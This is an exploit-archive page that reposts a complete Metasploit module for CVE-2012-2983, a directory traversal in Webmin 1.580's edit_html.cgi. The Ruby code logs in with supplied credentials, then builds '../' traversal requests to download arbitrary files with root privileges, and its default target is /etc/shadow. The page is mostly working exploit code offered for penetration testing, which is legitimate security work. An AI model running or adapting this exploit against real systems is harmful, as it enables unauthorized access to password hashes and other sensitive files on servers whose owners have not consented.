exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Webmin Edit_html.cgi File Parameter Traversal Arbitrary File Access

Webmin Edit_html.cgi File Parameter Traversal Arbitrary File Access
Posted Aug 31, 2024
Authored by juan vazquez, temp66 | Site metasploit.com

This Metasploit module exploits a directory traversal in Webmin 1.580. The vulnerability exists in the edit_html.cgi component and allows an authenticated user with access to the File Manager Module to access arbitrary files with root privileges. The module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.

tags | exploit, arbitrary, cgi, root
systems | linux, ubuntu
advisories | CVE-2012-2983
SHA-256 | 6c0a9a2b80ec4a4d227511510ff034d0be1d1387d4299cbb7189ca3bd983eb19

Webmin Edit_html.cgi File Parameter Traversal Arbitrary File Access

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',
'Description' => %q{
This module exploits a directory traversal in Webmin 1.580. The vulnerability
exists in the edit_html.cgi component and allows an authenticated user with access
to the File Manager Module to access arbitrary files with root privileges. The
module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.
},
'Author' => [
'Unknown', # From American Information Security Group
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '85247'],
['BID', '55446'],
['CVE', '2012-2983'],
['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],
['URL', 'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80']
],
'DisclosureDate' => '2012-09-06',
'Actions' =>
[
['Download', 'Description' => 'Download arbitrary file']
],
'DefaultAction' => 'Download'
))

register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptInt.new('DEPTH', [true, 'Traversal depth', 4]),
OptString.new('RPATH', [ true, "The file to download", "/etc/shadow" ])
])
end

def run

peer = "#{rhost}:#{rport}"

print_status("Attempting to login...")

data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"

res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)

if res and res.code == 302 and res.get_cookies =~ /sid/
session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
if session and not session.empty?
print_good "Authentication successful"
else
print_error "Authentication failed"
return
end
else
print_error "Authentication failed"
return
end

print_status("Attempting to retrieve #{datastore['RPATH']}...")

traversal = "../" * datastore['DEPTH']
traversal << datastore['RPATH']
data = "file=#{traversal}&text=1"

res = send_request_cgi(
{
'method' => 'GET',
'uri' => "/file/edit_html.cgi?#{data}",
'cookie' => "sid=#{session}"
}, 25)

if (res and res.code == 200 and res.body =~ /#{traversal}/ and res.body =~ /name=body>(.*)<\/textarea>/m)
loot = $1
f = ::File.basename(datastore['RPATH'])
path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH'])
print_good("#{datastore['RPATH']} saved in #{path}")
else
print_error("Failed to retrieve the file")
return
end

end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close